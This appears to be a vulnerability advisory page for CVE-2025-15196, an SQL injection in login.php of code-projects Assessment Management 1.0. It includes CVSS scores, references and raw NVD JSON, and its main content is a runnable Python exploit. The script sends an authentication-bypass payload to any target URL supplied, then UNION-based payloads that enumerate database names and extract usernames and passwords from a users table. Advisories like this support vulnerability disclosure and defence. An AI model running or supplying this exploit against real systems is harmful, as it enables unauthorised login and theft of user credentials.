CVE-2025-15196

Description

A vulnerability was identified in code-projects Assessment Management 1.0. This affects an unknown part of the file login.php. Such manipulation of the argument userid leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:code-projects:assessment_management:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Assessment Management 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15196 SQL Injection PoC
# Target: code-projects Assessment Management 1.0
# Endpoint: login.php
# Parameter: userid

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection in login.php userid parameter
    """
    # Target login endpoint
    login_url = f"{target_url}/login.php"
    
    # Malicious payload for SQL injection
    data = {
        'userid': payload,
        'password': 'anything',
        'submit': 'Login'
    }
    
    try:
        response = requests.post(login_url, data=data, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15196.py <target_url>")
        print("Example: python cve-2025-15196.py http://localhost/assessment")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print("[*] CVE-2025-15196 SQL Injection Exploit")
    print(f"[*] Target: {target}")
    
    # Test basic SQL injection - bypass authentication
    print("\n[*] Testing authentication bypass...")
    payload = "' OR '1'='1"
    response = exploit_sqli(target, payload)
    
    if response and 'login' not in response.url.lower():
        print("[+] Authentication bypass successful!")
    else:
        print("[-] Basic bypass failed, trying UNION-based injection...")
    
    # UNION-based extraction payload
    union_payload = "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL---"
    print(f"\n[*] Testing UNION-based injection...")
    response = exploit_sqli(target, union_payload)
    
    # Database enumeration payload
    enum_payload = "' UNION SELECT schema_name,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.schemata---"
    print(f"\n[*] Extracting database names...")
    response = exploit_sqli(target, enum_payload)
    
    # User table extraction payload
    user_payload = "' UNION SELECT username,password,NULL,NULL,NULL,NULL,NULL FROM users---"
    print(f"\n[*] Extracting user credentials...")
    response = exploit_sqli(target, user_payload)
    
    print("\n[!] Manual verification required for data extraction")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15196
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15196
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15196/
[4] VulDB https://vuldb.com/cve/CVE-2025-15196
[5] https://code-projects.org/
[6] https://github.com/Limingqian123/CVE/issues/4
[7] https://vuldb.com/?ctiid.338583
[8] https://vuldb.com/?id.338583
[9] https://vuldb.com/?submit.724718

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15196", "sourceIdentifier": "[email protected]", "published": "2025-12-29T17:15:44.520", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in code-projects Assessment Management 1.0. This affects an unknown part of the file login.php. Such manipulation of the argument userid leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:code-projects:assessment_management:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FEF2E5F6-5C2F-4BB4-9837-37F20EF60B98"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Limingqian123/CVE/issues/4", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338583", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338583", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.724718", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}